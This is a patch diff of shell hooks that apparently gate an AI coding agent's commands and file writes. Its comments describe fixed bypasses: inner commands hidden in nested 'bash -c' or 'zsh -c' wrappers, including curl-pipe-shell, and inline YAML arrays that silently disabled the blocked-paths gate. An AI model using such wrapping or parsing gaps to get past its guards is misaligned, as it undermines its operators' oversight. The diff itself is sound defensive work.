+ # cannot appear in real shell input under UTF-8 (NUL, BEL, VT, FF
119
+ # are reserved by some shells; we use SOH/STX/ETX/ENQ/ACK which are
120
+ # not assigned operational meaning by any shell we ship with).
121
+ # \x01 SOH — replaces in-quote `"`
122
+ # \x02 STX — replaces in-quote `'`
123
+ # \x03 ETX — replaces in-quote `;`
124
+ # \x05 ENQ — replaces in-quote `&`
125
+ # \x06 ACK — replaces in-quote `|`
126
+ local masked
127
+ masked=$(printf '%s' "$cmd" | awk '
128
+ {
129
+ line = $0
130
+ out = ""
131
+ i = 1
132
+ n = length(line)
133
+ mode = 0
134
+ while (i <= n) {
135
+ ch = substr(line, i, 1)
136
+ if (mode == 0) {
137
+ if (ch == "\"") { mode = 1; out = out ch; i++; continue }
138
+ if (ch == "'\''") { mode = 2; out = out ch; i++; continue }
139
+ out = out ch
140
+ i++
141
+ continue
142
+ }
143
+ if (mode == 2) {
144
+ if (ch == "'\''") { mode = 0; out = out "\002"; i++; continue }
145
+ if (ch == ";") { out = out "\003"; i++; continue }
146
+ if (ch == "&") { out = out "\005"; i++; continue }
147
+ if (ch == "|") { out = out "\006"; i++; continue }
148
+ if (ch == "\"") { out = out "\001"; i++; continue }
149
+ out = out ch
150
+ i++
151
+ continue
152
+ }
153
+ # mode == 1 (double-quoted)
154
+ if (ch == "\\" && i < n) {
155
+ # Preserve the escape pair literally — width preserved.
156
+ nxt = substr(line, i + 1, 1)
157
+ out = out ch nxt
158
+ i += 2
159
+ continue
160
+ }
161
+ if (ch == "\"") { mode = 0; out = out "\001"; i++; continue }
162
+ if (ch == ";") { out = out "\003"; i++; continue }
163
+ if (ch == "&") { out = out "\005"; i++; continue }
164
+ if (ch == "|") { out = out "\006"; i++; continue }
165
+ if (ch == "'\''") { out = out "\002"; i++; continue }
166
+ out = out ch
167
+ i++
168
+ }
169
+ printf "%s", out
170
+ }')
171
+ # Pass both raw and masked into awk. Wrapper-regex matches against the
172
+ # masked form; payload extraction reads the raw form using the same
173
+ # offsets. Because the mask is byte-for-byte width-preserving, the
174
+ # same RSTART/RLENGTH applies to both.
175
+ printf '' | awk -v raw="$cmd" -v masked="$masked" '
176
+ BEGIN {
177
+ # Wrapper-prefix regex: shell-name + optional flag tokens + -c-style flag.
178
+ # Each flag token is `-` followed by 1+ letters and trailing space.
179
+ # NOTE: matches only OUTSIDE outer quoted spans because in-quote
180
+ # `"`, `'\''`, `;`, `&`, `|` are masked out in `masked`. The leading
181
+ # alternation `(^|[[:space:]&|;])` therefore cannot anchor on a
182
+ # masked separator, and the shell-name token itself can no longer
183
+ # appear adjacent to a masked quote-introducer.
184
+ WRAP = "(^|[[:space:]&|;])(bash|sh|zsh|dash|ksh)([[:space:]]+-[a-zA-Z]+)*[[:space:]]+-(c|lc|lic|ic|cl|cli|li|il)[[:space:]]+"
185
+ # Track the cursor in BOTH raw and masked. Because the mask is
186
+ # byte-for-byte width-preserving, the same RSTART/RLENGTH applies
187
+ # to both — but each iteration of the loop must SLICE both strings
188
+ # by the same amount so subsequent matches see synchronized tails.
189
+ mrest = masked
190
+ rrest = raw
191
+ while (length(mrest) > 0) {
192
+ if (! match(mrest, WRAP)) break
193
+ # Tail begins immediately after the matched wrapper prefix in
194
+ # BOTH strings (offsets line up — mask is width-preserving).
195
+ mtail = substr(mrest, RSTART + RLENGTH)
196
+ rtail = substr(rrest, RSTART + RLENGTH)
197
+ # The wrapper-payload-introducing quote must be a REAL outer
198
+ # quote — i.e. not a masked in-quote sentinel. Probe the raw
199
+ # form for the introducer character, which the mask preserved
200
+ # verbatim only when it was an outer quote.
201
+ first = substr(rtail, 1, 1)
202
+ mfirst = substr(mtail, 1, 1)
203
+ if (first == "'\''" && mfirst == "'\''") {
204
+ # Single-quoted body: no escape semantics; runs to next `'\''`.
205
+ body = substr(rtail, 2)
206
+ mbody = substr(mtail, 2)
207
+ end = index(body, "'\''")
208
+ if (end == 0) {
209
+ mrest = substr(mtail, 2)
210
+ rrest = substr(rtail, 2)
211
+ continue
212
+ }
213
+ payload = substr(body, 1, end - 1)
214
+ print payload
215
+ mrest = substr(mbody, end + 1)
216
+ rrest = substr(body, end + 1)
217
+ continue
218
+ }
219
+ if (first == "\"" && mfirst == "\"") {
220
+ # Double-quoted body: \" and \\ are literal escapes.
221
+ body = substr(rtail, 2)
222
+ n = length(body)
223
+ j = 1
224
+ out = ""
225
+ closed = 0
226
+ while (j <= n) {
227
+ c = substr(body, j, 1)
228
+ if (c == "\\" && j < n) {
229
+ nxt = substr(body, j + 1, 1)
230
+ if (nxt == "\"" || nxt == "\\") { out = out nxt; j += 2; continue }
231
+ out = out c nxt
232
+ j += 2
233
+ continue
234
+ }
235
+ if (c == "\"") { closed = j; break }
236
+ out = out c
237
+ j++
238
+ }
239
+ if (closed == 0) {
240
+ mrest = substr(mtail, 2)
241
+ rrest = substr(rtail, 2)
242
+ continue
243
+ }
244
+ print out
245
+ # Skip past the opening `"` (1 byte) AND the closing `"` (1
246
+ # byte at body[closed], i.e. mtail[closed+1]). Cursor lands
247
+ # at mtail[closed+2].
248
+ mrest = substr(mtail, closed + 2)
249
+ rrest = substr(rtail, closed + 2)
250
+ continue
251
+ }
252
+ # Non-quoted argument — proceed past the matched prefix only.
253
+ mrest = mtail
254
+ rrest = rtail
255
+ }
256
+ }
257
+ # Empty action with no input rules — explicitly drive the loop from
258
+ # END so awk does not require any input records.
259
+ END {}'
260
+ }
261
+
54
262
  # Split $1 on shell command separators. Emits one segment per line on
55
263
  # stdout (empty segments preserved). Used by both higher-level helpers
56
264
  # below; not generally called by hooks directly.
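Note (illustrative, not part of the diff): the unwrap helper added above emits the original command plus each inner `-c` payload as separate records. A much smaller sketch of that idea follows. It assumes a single-quoted payload only and a hypothetical function name `unwrap_single_quoted`; the shipped awk helper also handles double-quoted payloads and masked quotes, which this sketch does not attempt.

```shell
#!/usr/bin/env bash
# Hypothetical, simplified stand-in for the unwrap step: print the original
# command, then the payload of the first `bash|sh|zsh -c '...'` wrapper found.
unwrap_single_quoted() {
  local cmd="$1"
  # Group 3 captures the single-quoted payload; `-[a-z]*c` accepts -c, -lc, etc.
  local re="(^|[[:space:];|&])(bash|sh|zsh)[[:space:]]+-[a-z]*c[[:space:]]+'([^']*)'"
  printf '%s\n' "$cmd"
  if [[ "$cmd" =~ $re ]]; then
    printf '%s\n' "${BASH_REMATCH[3]}"
  fi
}

unwrap_single_quoted "bash -lc 'npm install pkg'"
```

Each emitted line can then be split and anchored independently, which is why the inner `npm install pkg` becomes visible to a leading-token check.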
@@ -103,7 +311,14 @@ _rea_split_segments() {
103
311
  # splitting so quoted prose no longer over-splits and anchors trigger
104
312
  # words at the head of phantom segments. See header comment for the
105
313
  # full rationale.
106
- printf '%s' "$cmd" \
314
+ #
315
+ # 0.17.0 helix-017 #1-#3 fix: unwrap `bash -c 'PAYLOAD'` style
316
+ # wrappers BEFORE the quote-mask + split passes. The unwrap step
317
+ # emits the original line plus each inner PAYLOAD as separate
318
+ # records; the existing pipeline then quote-masks and splits each
319
+ # record independently. Inner payload anchors trigger words for the
320
+ # `any_segment_*` checks downstream.
321
+ _rea_unwrap_nested_shells "$cmd" \
107
322
  | awk '
108
323
  BEGIN {
109
324
  SC = "__REA_SEP_SC_a8f2c1__"
@@ -53,20 +53,80 @@ policy_bool_true() {
53
53
  [[ "$value" == "true" ]]
54
54
  }
55
55
 
56
- # Read a list of scalars from a top-level sequence block.
56
+ # Read a list of scalars from a top-level sequence.
57
57
  # Usage: mapfile -t patterns < <(policy_list "delegate_to_subagent")
58
- # Handles inline "[]" as empty. Stops at the first non-"-" continuation line.
58
+ #
59
+ # Recognized YAML forms:
60
+ #
61
+ # 1. Block sequence (the historical / canonical form):
62
+ # blocked_paths:
63
+ # - .env
64
+ # - .env.*
65
+ # - .rea/HALT
66
+ #
67
+ # 2. Empty inline array (since 0.1.x):
68
+ # blocked_paths: [] # → no entries (returns successfully)
69
+ #
70
+ # 3. Non-empty inline array (added 0.18.0 G1.B/G1.C):
71
+ # blocked_paths: [.env, .env.*, .rea/HALT]
72
+ #
73
+ # Inline arrays may span multiple lines:
74
+ #
75
+ # blocked_paths: [
76
+ # .env,
77
+ # .env.*,
78
+ # .rea/HALT
79
+ # ]
80
+ #
81
+ # Quoted entries (single or double quotes) are unquoted. Leading and
82
+ # trailing whitespace on each entry is trimmed. Empty entries (e.g. from
83
+ # a trailing `,`) are skipped silently.
84
+ #
85
+ # Pre-fix (G1.B/G1.C): the inline array form was VALID YAML but parsed
86
+ # to an empty list — silent bypass of `blocked-paths-bash-gate.sh` and
87
+ # silent ignore of `protected_writes` overrides. Fixed by extending the
88
+ # parser to recognize the inline form in addition to the block form.
89
+ #
90
+ # The block form is still preferred (sed-friendly, line-aligned diffs)
91
+ # but the inline form is now equally enforced.
59
92
  policy_list() {
60
93
  local key="$1"
61
94
  local policy
62
95
  policy=$(policy_path)
63
96
  [[ -z "$policy" ]] && return 0
64
97
  local in_block=0
98
+ local in_inline=0
99
+ local inline_buf=""
65
100
  while IFS= read -r line; do
101
+ # Skip while we're collecting an inline-array body across lines.
102
+ if [[ $in_inline -eq 1 ]]; then
103
+ inline_buf="${inline_buf} ${line}"
104
+ # Detect the closing `]` (any position on the line).
105
+ if printf '%s' "$line" | grep -qE '\]'; then
106
+ _policy_emit_inline_array "$inline_buf"
107
+ return 0
108
+ fi
109
+ continue
110
+ fi
66
111
  if printf '%s' "$line" | grep -qE "^[[:space:]]*${key}:"; then
67
- if printf '%s' "$line" | grep -qE "${key}:[[:space:]]*\[\]"; then
112
+ # Empty inline `[]`: explicit empty list.
113
+ if printf '%s' "$line" | grep -qE "${key}:[[:space:]]*\[[[:space:]]*\]"; then
68
114
  return 0
69
115
  fi
116
+ # Non-empty inline `[ ... ]` — parse the bracketed body. May or
117
+ # may not close on the same line.
118
+ if printf '%s' "$line" | grep -qE "${key}:[[:space:]]*\["; then
119
+ # Strip everything up to and including the opening `[`.
120
+ inline_buf=$(printf '%s' "$line" | sed -E "s/^.*${key}:[[:space:]]*\[//")
121
+ if printf '%s' "$inline_buf" | grep -qE '\]'; then
122
+ # Single-line inline array.
123
+ _policy_emit_inline_array "$inline_buf"
124
+ return 0
125
+ fi
126
+ in_inline=1
127
+ continue
128
+ fi
129
+ # Block-form sequence header — entries follow on subsequent lines.
70
130
  in_block=1
71
131
  continue
72
132
  fi
@@ -80,3 +140,31 @@ policy_list() {
80
140
  fi
81
141
  done < "$policy"
82
142
  }
143
+
144
+ # Emit each entry of an inline-array body (everything between `[` and
145
+ # `]`, possibly across newlines if the caller concatenated lines with
146
+ # spaces). Strips outer brackets, splits on `,`, trims whitespace and
147
+ # matched outer quotes, drops empty entries (trailing-comma tolerance).
148
+ _policy_emit_inline_array() {
149
+ local buf="$1"
150
+ # Drop the closing `]` and anything after it (line comments etc).
151
+ buf=$(printf '%s' "$buf" | sed -E 's/\].*$//')
152
+ # Split on commas.
153
+ local IFS=','
154
+ local raw
155
+ for raw in $buf; do
156
+ # Trim leading + trailing whitespace.
157
+ raw="${raw#"${raw%%[![:space:]]*}"}"
158
+ raw="${raw%"${raw##*[![:space:]]}"}"
159
+ # Drop trailing inline comment (` # comment`).
160
+ raw=$(printf '%s' "$raw" | sed -E 's/[[:space:]]+#.*$//')
161
+ # Re-trim after comment stripping.
162
+ raw="${raw#"${raw%%[![:space:]]*}"}"
163
+ raw="${raw%"${raw##*[![:space:]]}"}"
164
+ # Skip empty entries (trailing comma, blank line in multi-line form).
165
+ [[ -z "$raw" ]] && continue
166
+ # Strip matched outer single or double quotes.
167
+ raw=$(printf '%s' "$raw" | sed -E "s/^[\"']//; s/[\"']$//")
168
+ printf '%s\n' "$raw"
169
+ done
170
+ }
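Note (illustrative, not part of the diff): a minimal sketch of splitting an inline-array body into entries, under the same rules the comments above describe (trim whitespace, skip empty entries, unquote). The function name `emit_inline_entries` is hypothetical. It uses `read -ra` rather than an unquoted `for raw in $buf`, because unquoted expansion in bash is also subject to pathname expansion, so an entry such as `.env.*` could expand against files in the working directory.

```shell
#!/usr/bin/env bash
# Hypothetical helper: print each entry of an inline YAML array body
# (the text after the opening `[`), one per line, with no globbing.
emit_inline_entries() {
  local buf="${1%%]*}"          # drop the closing `]` and anything after it
  local -a parts=()
  local raw
  # `read -ra` splits on IFS without pathname expansion.
  IFS=',' read -ra parts <<< "$buf"
  for raw in "${parts[@]}"; do
    raw="${raw#"${raw%%[![:space:]]*}"}"   # trim leading whitespace
    raw="${raw%"${raw##*[![:space:]]}"}"   # trim trailing whitespace
    [[ -z "$raw" ]] && continue            # tolerate trailing commas
    # Strip one pair of matched outer quotes only.
    if [[ "$raw" == \"*\" || "$raw" == \'*\' ]] && (( ${#raw} >= 2 )); then
      raw="${raw:1:${#raw}-2}"
    fi
    printf '%s\n' "$raw"
  done
}

emit_inline_entries ' .env, ".env.*", .rea/HALT, ]  # trailing comment'
```

For the multi-line form, the caller is assumed to have joined the lines with spaces first, as `policy_list` does with `inline_buf`.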
@@ -58,6 +58,13 @@ REA_KILL_SWITCH_INVARIANTS=(
58
58
  # first call to `rea_path_is_protected`; stays the same for the lifetime
59
59
  # of the hook process.
60
60
  REA_PROTECTED_PATTERNS=()
61
+ # 0.18.0 helix-020 G2 fix: track which patterns came from the consumer's
62
+ # explicit `protected_writes` override (vs. the hardcoded default). The
63
+ # override-first ordering in `rea_path_is_protected` checks ONLY this
64
+ # subset before consulting the extension-surface allow-list, so an
65
+ # explicit `protected_writes: [.husky/pre-push.d/]` can re-protect a
66
+ # path that the allow-list would otherwise let through.
67
+ REA_PROTECTED_OVERRIDE_PATTERNS=()
61
68
  _REA_PROTECTED_PATTERNS_LOADED=0
62
69
 
63
70
  # True if $1 is a kill-switch invariant (case-insensitive exact or
@@ -75,8 +82,16 @@ _rea_is_kill_switch() {
75
82
  return 1
76
83
  }
77
84
 
78
- # Load the effective list, applying `protected_paths_relax` from policy.
85
+ # Load the effective list, applying `protected_writes` (full override
86
+ # from policy) and `protected_paths_relax` (subtractor) from policy.
79
87
  # Sources policy-read.sh on demand so this lib stays self-contained.
88
+ #
89
+ # 0.17.0 helix-018 Option A: `protected_writes` lets consumers fully
90
+ # define the protected list. When set, replaces the hardcoded default;
91
+ # kill-switch invariants are always added back regardless. When unset,
92
+ # defaults to REA_PROTECTED_PATTERNS_FULL (the historical 5 patterns).
93
+ # `protected_paths_relax` then subtracts from whatever the effective
94
+ # set is (kill-switch invariants are non-relaxable).
80
95
  _rea_load_protected_patterns() {
81
96
  if [ "$_REA_PROTECTED_PATTERNS_LOADED" = "1" ]; then
82
97
  return 0
@@ -89,14 +104,71 @@ _rea_load_protected_patterns() {
89
104
  source "${BASH_SOURCE[0]%/*}/policy-read.sh" 2>/dev/null || true
90
105
  fi
91
106
 
107
+ # Read both policy keys.
108
+ local writes_list=()
92
109
  local relax_list=()
110
+ local protected_writes_set=0
93
111
  if command -v policy_list >/dev/null 2>&1; then
112
+ # `protected_writes`: detect "set but empty" vs "unset" via a probe.
113
+ # policy_list returns nothing for both cases, so we use a sentinel
114
+ # check on the YAML key existence via a separate probe.
115
+ local pw_present
116
+ pw_present=$(policy_scalar "protected_writes" 2>/dev/null || true)
117
+ # If the key is a list (yq returns "null" or empty for scalar reads
118
+ # of a list), policy_list reads it. We detect "key exists" by
119
+ # checking either policy_scalar's return OR policy_list's output.
120
+ while IFS= read -r entry; do
121
+ [ -z "$entry" ] && continue
122
+ writes_list+=("$entry")
123
+ protected_writes_set=1
124
+ done < <(policy_list "protected_writes" 2>/dev/null || true)
125
+ # If pw_present is "[]" (empty array) — policy_list returns nothing
126
+ # but the key IS set. policy_scalar of a list returns "null" or
127
+ # the literal `[]`. Treat any of those as "set".
128
+ case "$pw_present" in
129
+ '[]'|'null') protected_writes_set=1 ;;
130
+ esac
131
+
94
132
  while IFS= read -r entry; do
95
133
  [ -z "$entry" ] && continue
96
134
  relax_list+=("$entry")
97
135
  done < <(policy_list "protected_paths_relax" 2>/dev/null || true)
98
136
  fi
99
137
 
138
+ # Compose the BASE list:
139
+ # - If `protected_writes` set in policy: that list, plus kill-switch
140
+ # invariants always added (deduped).
141
+ # - Else: REA_PROTECTED_PATTERNS_FULL (hardcoded historical default).
142
+ local base_list=()
143
+ if [ "$protected_writes_set" = "1" ]; then
144
+ local w
145
+ for w in "${writes_list[@]+"${writes_list[@]}"}"; do
146
+ base_list+=("$w")
147
+ done
148
+ # Add kill-switch invariants if not already present.
149
+ local inv inv_lc found
150
+ for inv in "${REA_KILL_SWITCH_INVARIANTS[@]}"; do
151
+ inv_lc=$(printf '%s' "$inv" | tr '[:upper:]' '[:lower:]')
152
+ found=0
153
+ local b b_lc
154
+ for b in "${base_list[@]+"${base_list[@]}"}"; do
155
+ b_lc=$(printf '%s' "$b" | tr '[:upper:]' '[:lower:]')
156
+ if [[ "$b_lc" == "$inv_lc" ]]; then
157
+ found=1
158
+ break
159
+ fi
160
+ done
161
+ if [ "$found" = "0" ]; then
162
+ base_list+=("$inv")
163
+ fi
164
+ done
165
+ else
166
+ local pat
167
+ for pat in "${REA_PROTECTED_PATTERNS_FULL[@]}"; do
168
+ base_list+=("$pat")
169
+ done
170
+ fi
171
+
100
172
  # Validate relax entries: any kill-switch invariant in the list is
101
173
  # silently dropped from "permitted to relax" but emits a stderr
102
174
  # advisory so the operator can see why their relax didn't take
@@ -112,10 +184,10 @@ _rea_load_protected_patterns() {
112
184
  fi
113
185
  done
114
186
 
115
- # Build the effective list: every FULL entry that is NOT in the
187
+ # Build the effective list: every BASE entry that is NOT in the
116
188
  # relaxed set (case-insensitive comparison).
117
189
  local pat pat_lc rentry rentry_lc relaxed
118
- for pat in "${REA_PROTECTED_PATTERNS_FULL[@]}"; do
190
+ for pat in "${base_list[@]+"${base_list[@]}"}"; do
119
191
  pat_lc=$(printf '%s' "$pat" | tr '[:upper:]' '[:lower:]')
120
192
  relaxed=0
121
193
  for rentry in "${relaxed_set[@]+"${relaxed_set[@]}"}"; do
@@ -130,6 +202,31 @@ _rea_load_protected_patterns() {
130
202
  fi
131
203
  done
132
204
 
205
+ # 0.18.0 helix-020 G2: also expose the EXPLICIT-OVERRIDE subset so
206
+ # `rea_path_is_protected` can prioritize override matches over the
207
+ # extension-surface allow-list. Only entries that came from a
208
+ # `protected_writes:` declaration land here — kill-switch invariants
209
+ # added defensively in step 2 above are NOT included (they get the
210
+ # historical "extension surface relaxes them" treatment, since the
211
+ # user did NOT explicitly opt in to protecting husky fragments).
212
+ if [ "$protected_writes_set" = "1" ]; then
213
+ local ow ow_lc rentry_lc2 relaxed2
214
+ for ow in "${writes_list[@]+"${writes_list[@]}"}"; do
215
+ ow_lc=$(printf '%s' "$ow" | tr '[:upper:]' '[:lower:]')
216
+ relaxed2=0
217
+ for rentry in "${relaxed_set[@]+"${relaxed_set[@]}"}"; do
218
+ rentry_lc2=$(printf '%s' "$rentry" | tr '[:upper:]' '[:lower:]')
219
+ if [[ "$ow_lc" == "$rentry_lc2" ]]; then
220
+ relaxed2=1
221
+ break
222
+ fi
223
+ done
224
+ if [ "$relaxed2" = "0" ]; then
225
+ REA_PROTECTED_OVERRIDE_PATTERNS+=("$ow")
226
+ fi
227
+ done
228
+ fi
229
+
133
230
  _REA_PROTECTED_PATTERNS_LOADED=1
134
231
  }
135
232
 
@@ -178,18 +275,57 @@ rea_path_is_extension_surface() {
178
275
  #
179
276
  # 0.16.4 helix-018 Option B: paths inside the documented husky
180
277
  # extension surface (`.husky/{commit-msg,pre-push,pre-commit}.d/*`)
181
- # return 1 (not protected) BEFORE the prefix-pattern check so they
182
- # don't get caught by `.husky/`'s prefix block. This mirrors the
183
- # §5b allow-list that has been in settings-protection.sh since 0.13.2.
278
+ # return 1 (not protected) by default so they don't get caught by
279
+ # `.husky/`'s prefix block. This mirrors the §5b allow-list that has
280
+ # been in settings-protection.sh since 0.13.2.
281
+ #
282
+ # 0.18.0 helix-020 G2 fix: ORDER MATTERS. The pre-fix function checked
283
+ # the extension-surface allow-list FIRST and short-circuited "not
284
+ # protected" unconditionally. That made the `protected_writes` /
285
+ # `protected_paths` override silently ineffective for any path inside
286
+ # the extension surface — a consumer who wanted `.husky/pre-push.d/`
287
+ # hardened could not opt in. The fix: explicit overrides win FIRST
288
+ # (the consumer asked for this), then the extension-surface
289
+ # short-circuit applies to anything else, then the default protected
290
+ # list. Pseudocode is the canonical version from helix-020 Interactive
291
+ # Finding 1.
184
292
  rea_path_is_protected() {
185
293
  _rea_load_protected_patterns
186
- # Extension-surface allow-list — short-circuit before pattern match.
187
- if rea_path_is_extension_surface "$1"; then
188
- return 1
189
- fi
190
294
  local p_lc
191
295
  p_lc=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
192
296
  local pattern pattern_lc
297
+
298
+ # 1. Explicit `protected_writes` overrides win. If the consumer
299
+ # listed this path (or its parent prefix) in `protected_writes`,
300
+ # we honor that intent even when the path is on the extension
301
+ # surface. This is what lets a consumer harden their managed
302
+ # `.husky/pre-push.d/` fragments — the carve-out for unmanaged
303
+ # consumer fragments is the default, but it can be undone.
304
+ for pattern in "${REA_PROTECTED_OVERRIDE_PATTERNS[@]+"${REA_PROTECTED_OVERRIDE_PATTERNS[@]}"}"; do
305
+ pattern_lc=$(printf '%s' "$pattern" | tr '[:upper:]' '[:lower:]')
306
+ if [[ "$p_lc" == "$pattern_lc" ]]; then
307
+ return 0
308
+ fi
309
+ if [[ "$pattern_lc" == */ ]] && [[ "$p_lc" == "$pattern_lc"* ]]; then
310
+ return 0
311
+ fi
312
+ done
313
+
314
+ # 2. Extension-surface allow-list. Paths inside the documented
315
+ # husky extension surface (`.husky/{commit-msg,pre-push,pre-commit}.d/*`)
316
+ # are NOT protected by default — the consumer manages those
317
+ # fragments freely; settings-protection.sh §5b has the same
318
+ # carve-out on the Write/Edit side. Step 1 above is what lets a
319
+ # consumer override that default per-path.
320
+ if rea_path_is_extension_surface "$1"; then
321
+ return 1
322
+ fi
323
+
324
+ # 3. Default protected list (kill-switch invariants + `.husky/`
325
+ # prefix block + `.claude/settings*` + `.rea/policy.yaml`). When
326
+ # `protected_writes` was set, kill-switch invariants are still
327
+ # enforced via this branch because they were added back into
328
+ # REA_PROTECTED_PATTERNS during `_rea_load_protected_patterns`.
193
329
  for pattern in "${REA_PROTECTED_PATTERNS[@]+"${REA_PROTECTED_PATTERNS[@]}"}"; do
194
330
  pattern_lc=$(printf '%s' "$pattern" | tr '[:upper:]' '[:lower:]')
195
331
  if [[ "$p_lc" == "$pattern_lc" ]]; then
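Note (illustrative, not part of the diff): the three-step ordering described in the comments above (explicit overrides, then the extension-surface carve-out, then the default list) can be sketched as follows. The arrays, their contents, and the function names are assumptions made for the example, not the package's data or API.

```shell
#!/usr/bin/env bash
# Illustrative stand-ins; values are assumptions.
OVERRIDES=(".husky/pre-push.d/")
DEFAULTS=(".husky/" ".rea/HALT")

lc() { printf '%s' "$1" | tr '[:upper:]' '[:lower:]'; }

# matches_any PATH PATTERN...: exact match, or prefix match when the
# pattern ends in `/` (case-insensitive).
matches_any() {
  local p pat
  p=$(lc "$1"); shift
  for pat in "$@"; do
    pat=$(lc "$pat")
    [[ "$p" == "$pat" ]] && return 0
    [[ "$pat" == */ && "$p" == "$pat"* ]] && return 0
  done
  return 1
}

is_extension_surface() {
  local re='^\.husky/(commit-msg|pre-push|pre-commit)\.d/.+'
  [[ "$(lc "$1")" =~ $re ]]
}

is_protected() {
  matches_any "$1" "${OVERRIDES[@]}" && return 0   # 1. explicit override wins
  is_extension_surface "$1" && return 1            # 2. carve-out applies next
  matches_any "$1" "${DEFAULTS[@]}"                # 3. default protected list
}

is_protected ".husky/pre-push.d/10-lint" && echo "protected by override"
is_protected ".husky/commit-msg.d/20-check" || echo "extension surface, not protected"
```

Swapping steps 1 and 2 reproduces the pre-fix behaviour the comment describes: the carve-out would return first and the override would never be consulted.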
@@ -58,13 +58,24 @@ fi
58
58
  source "$(dirname "$0")/_lib/cmd-segments.sh"
59
59
 
60
60
  # ── 6. Check if this is a relevant command ────────────────────────────────────
61
+ # 0.18.0 helix-020 / discord-ops Round 10 #2 fix (G4.A): use
62
+ # `any_segment_starts_with`, not `any_segment_matches`. The pre-fix
63
+ # matcher used the unanchored form, so a segment like
64
+ # gh pr edit --body "tracked: gh pr create earlier in the run"
65
+ # triggered IS_RELEVANT=1 because the substring `gh pr create` was
66
+ # anywhere in the segment. The downstream attribution check then
67
+ # scanned the body for the markdown-link / Co-Authored-By patterns,
68
+ # and ANY mention of those terms in the body's prose got blocked
69
+ # even though the actual command was a `gh pr edit` whose intent had
70
+ # nothing to do with structural attribution. The same anchoring fix
71
+ # `dangerous-bash-interceptor.sh` got in 0.16.3 F5 finally lands here.
61
72
  IS_RELEVANT=0
62
73
 
63
- if any_segment_matches "$CMD" 'gh[[:space:]]+pr[[:space:]]+(create|edit)'; then
74
+ if any_segment_starts_with "$CMD" 'gh[[:space:]]+pr[[:space:]]+(create|edit)'; then
64
75
  IS_RELEVANT=1
65
76
  fi
66
77
 
67
- if any_segment_matches "$CMD" 'git[[:space:]]+commit'; then
78
+ if any_segment_starts_with "$CMD" 'git[[:space:]]+commit'; then
68
79
  IS_RELEVANT=1
69
80
  fi
70
81
 
@@ -77,7 +88,21 @@ fi
77
88
  FOUND=0
78
89
 
79
90
  # Co-Authored-By with noreply@ email
80
- if any_segment_matches "$CMD" 'Co-Authored-By:.*noreply@'; then
91
+ # 0.18.0 helix-020 / discord-ops Round 10 #3 fix (G4.B): exclude
92
+ # GitHub's legitimate `<user>@users.noreply.github.com` collaborator
93
+ # footers from the noreply match. Pre-fix the regex `Co-Authored-By:.*noreply@`
94
+ # matched both AI-tool noreply addresses (anthropic.com, openai.com,
95
+ # github-copilot, etc.) AND GitHub's per-user noreply form, blocking
96
+ # legitimate human collaborator credits. The new regex requires
97
+ # `noreply@` to be followed by something that ISN'T `users.noreply.github.com`
98
+ # — covered via a negative-lookahead simulation: match `noreply@` then
99
+ # either end-of-line, whitespace, `>`, or a domain that does NOT begin
100
+ # with `users.noreply.github.com`. POSIX ERE has no lookarounds, so we
101
+ # enumerate the allowed-prefix shapes explicitly. The "AI names" branch
102
+ # below catches Co-Authored-By with named tools regardless of the email
103
+ # domain, so dropping `users.noreply.github.com` from the noreply
104
+ # pattern only relaxes the check for human collaborators — never for AI.
105
+ if any_segment_matches "$CMD" 'Co-Authored-By:.*noreply@(anthropic\.com|openai\.com|github-copilot|github\.com|claude\.ai|chatgpt\.com|googlemail\.com|google\.com|cursor\.com|codeium\.com|tabnine\.com|amazon\.com|amazonaws\.com|amazon-q\.amazonaws\.com|cody\.dev|sourcegraph\.com)'; then
81
106
  FOUND=1
82
107
  fi
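Note (illustrative, not part of the diff): because POSIX ERE has no lookarounds, the check above enumerates the domains it wants to match instead of excluding one. A small sketch with a shortened domain list shows the shape; the variable and function names are hypothetical, and the shipped pattern lists more domains.

```shell
#!/usr/bin/env bash
# Shortened, illustrative allow-list of AI-tool noreply domains.
AI_NOREPLY='Co-Authored-By:.*noreply@(anthropic\.com|openai\.com|github\.com)'

# Succeeds when the line carries a Co-Authored-By footer with an enumerated domain.
is_ai_noreply() { printf '%s\n' "$1" | grep -qiE "$AI_NOREPLY"; }

is_ai_noreply 'Co-Authored-By: Claude <noreply@anthropic.com>' && echo "blocked"
is_ai_noreply 'Co-Authored-By: Jane <12345+jane@users.noreply.github.com>' || echo "allowed"
```

Enumeration trades completeness for precision: a domain missing from the list is not caught by this branch, which is why the separate named-tool check matters.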
83
108
 
@@ -257,8 +257,21 @@ fi
257
257
  # in-quote pipes are replaced with a sentinel that the regex doesn't
258
258
  # match. Real curl-pipe-shell still matches because the pipe between
259
259
  # `curl https://x` and `sh` is outside any quote span.
260
- H12_MASKED=$(quote_masked_cmd "$CMD")
261
- if printf '%s' "$H12_MASKED" | grep -qiE '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(bash|sh|zsh|fish)'; then
260
+ # 0.17.0 helix-017 #1 fix: also scan inner payloads of nested-shell
261
+ # wrappers (`zsh -c "curl https://x | sh"`). The unwrap helper emits
262
+ # the original command + each inner payload as separate lines; we
263
+ # quote-mask each line independently and grep. If ANY emitted line
264
+ # contains a real curl-pipe-shell, fire H12.
265
+ H12_HIT=0
266
+ while IFS= read -r _h12_line; do
267
+ [ -z "$_h12_line" ] && continue
268
+ _h12_masked=$(quote_masked_cmd "$_h12_line")
269
+ if printf '%s' "$_h12_masked" | grep -qiE '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(bash|sh|zsh|fish)'; then
270
+ H12_HIT=1
271
+ break
272
+ fi
273
+ done < <(_rea_unwrap_nested_shells "$CMD")
274
+ if [ "$H12_HIT" = "1" ]; then
262
275
  add_high \
263
276
  "curl/wget piped to shell — remote code execution" \
264
277
  "Executing remote scripts without inspection is a major supply chain risk." \
@@ -58,14 +58,27 @@ extract_packages() {
58
58
  # outer command — but they're never the FIRST token on a segment, so
59
59
  # the anchor rejects them.
60
60
 
61
- # Tokenize on shell separators. Each `IFS=` entry becomes a separate
62
- # segment we can anchor against. We use bash's `mapfile` with a sed
63
- # to inject newlines at separators; awk-based splitting handles the
64
- # quoting heuristic well enough for the realistic cases (agent-issued
65
- # commands rarely have separators inside single-quoted strings that
66
- # would confuse this).
61
+ # 0.17.0 helix-017 #3: unwrap nested-shell wrappers (`bash -c 'PAYLOAD'`,
62
+ # `sh -lc "PAYLOAD"`, etc.) before splitting so the inner install
63
+ # command becomes a segment that anchors against the install-pattern
64
+ # check below. Pre-fix `bash -lc 'npm install pkg'` produced a single
65
+ # segment whose first token was `bash` — install-detection skipped.
66
